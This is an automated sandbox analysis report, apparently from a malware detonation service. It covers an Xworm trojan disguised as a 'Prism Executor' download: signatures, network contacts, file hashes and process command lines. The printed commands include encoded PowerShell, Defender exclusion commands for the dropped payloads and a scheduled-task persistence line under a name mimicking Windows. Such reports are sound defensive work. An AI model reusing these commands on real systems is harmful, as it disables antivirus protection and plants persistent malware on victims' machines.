Analysis Overview
Threat Level: Known bad
The file https://gofile.io/d/041JEG was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Command and Scripting Interpreter: PowerShell
Drops startup file
Loads dropped DLL
Executes dropped EXE
Adds Run key to start application
Looks up external IP address via web service
Enumerates physical storage devices
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
NTFS ADS
Suspicious behavior: AddClipboardFormatListener
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious use of SendNotifyMessage
Creates scheduled task(s)
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-15 04:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-15 04:22
Reported
2024-06-15 04:23
Platform
win11-20240611-en
Max time kernel
83s
Max time network
85s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\dllhost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\dllhost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Prism Release\Prism Release V1.5.exe | N/A |
| N/A | N/A | C:\Users\Admin\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Prism Executor.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_5048_133628990018862025\nexusloader.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" | C:\Users\Admin\dllhost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Prism Release.rar:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\dllhost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\dllhost.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/041JEG
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ffa1eaa3cb8,0x7ffa1eaa3cc8,0x7ffa1eaa3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5100 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5912 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2036698241732328801,17523985626345317063,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:1
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Prism Release\" -spe -an -ai#7zMap31838:88:7zEvent11259
C:\Users\Admin\Downloads\Prism Release\Prism Release V1.5.exe
"C:\Users\Admin\Downloads\Prism Release\Prism Release V1.5.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="
C:\Users\Admin\dllhost.exe
"C:\Users\Admin\dllhost.exe"
C:\Users\Admin\Prism Executor.exe
"C:\Users\Admin\Prism Executor.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_5048_133628990018862025\nexusloader.exe
"C:\Users\Admin\Prism Executor.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 51.38.43.18:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| DE | 148.251.13.139:443 | ad.a-ads.com | tcp |
| DE | 148.251.1.246:443 | static.a-ads.com | tcp |
| US | 8.8.8.8:53 | 246.1.251.148.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 206.168.190.239:443 | store9.gofile.io | tcp |
| US | 206.168.190.239:443 | store9.gofile.io | tcp |
| SE | 192.229.221.95:80 | tcp | |
| US | 20.189.173.15:443 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 91.92.241.69:5555 | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 46bfadfc09e91238fe82de0fe30d91d2 |
| SHA1 | 5da9d92d08803a52c63c1b96c6027e603e5fc3ef |
| SHA256 | 99733b0f1fec41252c1cf23c4a77b60aa371815f1c4c6fca5b0f81e81edf0f1d |
| SHA512 | 594994c4261e410c895b7f9b83562cd35eff449acb8fe1c124939a9e6c6fb8153516aff2445719fb73e8ba9df98c425ab30f247aa30571fc4d9cf2979f7582ae |
\??\pipe\LOCAL\crashpad_1188_TIUIUHDSKYGHEPXZ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6c9e5afa53a396c5663f22632a417d09 |
| SHA1 | d0ab4eae378aafc7dfbf87e22a3113a642f0633a |
| SHA256 | 50ded1ff4676a285d97aca12244287f807e5c9dc5d258a63fb22a248557fb9b1 |
| SHA512 | 543d694c98ef09020792e911313b31da77233a39d7de4d7ebe320bbd82b6c830f86983bbd5642b6c546b50de90e1644b80e2fb8400dd95800ec7c44bc17947e5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a4d9891c0b0da9409fb6aac14867b620 |
| SHA1 | 0bd16c4cb9a60d5de8c6528188a8cf22376c184f |
| SHA256 | 32070cb11081f2905fa757ccf130b1ed38642aa41dddfa5f97fcdc3a3d99257c |
| SHA512 | 135f08c32db2ad597fbbaaeed618bc340ce74607de65ef2d601ca96636e5e0ffca1330522cdf805177275f2af8ed720f2d92939d181a0a348dcfcb0843aae813 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Downloads\Prism Release.rar
| MD5 | 2457eb120e8fbef34c97cef775362cc9 |
| SHA1 | 547d2a58c06febe45ba1f0deabdf68b759f40029 |
| SHA256 | 1f4fbb86e1e513b8bed2fa7a011d094e9f4dbb213e7ae8c34693c6f5343442c3 |
| SHA512 | e9e4ac28364ccb457000f9863ac3b8616b75bed9b52e815d90d6fceff6305c823df06548263555d81758af5f6fc5d3cfde2fed64e3c774075abf2801a181a4fb |
C:\Users\Admin\Downloads\Prism Release.rar:Zone.Identifier
| MD5 | f328e184c322cba91dc3c014fe2ef3e9 |
| SHA1 | 2aab1f0a70009051dcc87350e0f3b079da02fbb2 |
| SHA256 | fe25e31061b432c3a3fdd8f797c6dadad253e83dfb305ee997a7302cd70b618d |
| SHA512 | e59501b550ea64155d134ae832812004ec298a44519eb03183542599174b7691be3225f6fa5064d45ed7ec81f0a93721eb8f401d7e2a49c4b91a70ded006c97e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 494092e84bd5e6a66504dc1191697398 |
| SHA1 | 1eb4bf4a7306511199d82a67782688f33be90378 |
| SHA256 | ced2af505f3db74edef3ec8c2fe186a375bfaf1185d02499e178f6454c2c5a50 |
| SHA512 | 2d373b25f3f94716c3d8935f2c3127d0059842b3234e9012b66fa7103fa31d34ac19f5b0aae5362b480bab7069fced3d3c5d9516bc6661550e4dc2db4131e95f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b53e022eee0d8e27388d4cc9e77b9344 |
| SHA1 | 000fc4ac75816275ed3e9768ac120558748db9b8 |
| SHA256 | 26077f682119a3c6e24e5bf138b5beeba0a34d7a58dc890750b624e713ea7672 |
| SHA512 | ab94e5cf1e720698063113ce1bb05b39d2750700a9de327262021353ef507cfbee840a21c669718b2b2fd095e77c26fde90e015008e9311315989dd5446bdcc6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | cd6050d3a6e28fcc0a9df3e9f978f892 |
| SHA1 | 7895b95d23de6bd2576f4a429ab578ce73f5cf6d |
| SHA256 | 89c9102fa54294c738a0a4ea65cb93f59033074669fcda7e59d09cdb552f9b0c |
| SHA512 | 02f866882c952386719a340be79817e79d22e1c040d8b7e13d52e511b4c1ac721731e0e039623027c0938d28dad36ecf6d6a7f969667bfd29884d24204a014cf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | bcf93b5bde4a890043b93afe94afd4fb |
| SHA1 | 4fe495a7194667d755e0624faf9b5f7e2974355e |
| SHA256 | 8aa5a5abb0650de654c77e6550b4d360ee1c33ce1cccd0b9646e9ca464ad6ce3 |
| SHA512 | a2598b9a5150d13d64f7a06afb44c8619ba7dcb7fc524f9b5c5eb58c7e61b82a1706380819ee805f0bfb007f5a228ecdfd0b41c158bb2a832b4ca8d9255b3dd8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ea91603127e621b7d0ae6eb7664dde13 |
| SHA1 | e50d647e477ad7c877c2e40f40a35a060154b027 |
| SHA256 | 8e180f2de9ab9a526e216b6eda066aa4a505bf9e9c528102003cc33d82e45fdb |
| SHA512 | 74b09488da68a60741b7d3b7563bcd9761693d6b1a0356f0b7d52e1f2bc9600fe79a1036d5a21045c306b1db5f4ca84f81a850293f8545ed69a370807e5a3340 |
C:\Users\Admin\Downloads\Prism Release\Prism Release V1.5.exe
| MD5 | ac80f970a7ae1c07663abdd11d752d34 |
| SHA1 | 5ee4c0de86dc91aebb47f3ea6b7e624e861fdfad |
| SHA256 | b61ca7c42fef43547c7892c76a925ec4a846373bfcde20426c913a4390f71001 |
| SHA512 | 7bd6150976477bec27532e7d7449e8a1ee6997b41359f3b31e2da8db0602f1ac0dfae171d8ebe00a0e18c2c77c7f9e4ed18352f7d8cf76c1cff855166ed6f94b |
C:\Users\Admin\dllhost.exe
| MD5 | 4a7f75343aaa5a4d8d18add50ccf3139 |
| SHA1 | 110c62eee6d7deb4aa9d601c942eae43482d2125 |
| SHA256 | 34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e |
| SHA512 | 1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79 |
C:\Users\Admin\Prism Executor.exe
| MD5 | fa819e23d8fee4ea89aaaea55e0b28f5 |
| SHA1 | 18335d4e0d140dcab66c7197c57f669251898ce5 |
| SHA256 | bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c |
| SHA512 | e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d |
memory/3292-201-0x0000000000C80000-0x0000000000C9A000-memory.dmp
memory/4796-467-0x0000000002C60000-0x0000000002C96000-memory.dmp
memory/4796-578-0x0000000005980000-0x0000000005FAA000-memory.dmp
memory/4796-872-0x0000000005800000-0x0000000005866000-memory.dmp
memory/4796-866-0x0000000005790000-0x00000000057F6000-memory.dmp
memory/4796-865-0x00000000056F0000-0x0000000005712000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ov0oxgpa.ylf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4796-1091-0x0000000005FB0000-0x0000000006307000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_5048_133628990018862025\python310.dll
| MD5 | 384349987b60775d6fc3a6d202c3e1bd |
| SHA1 | 701cb80c55f859ad4a31c53aa744a00d61e467e5 |
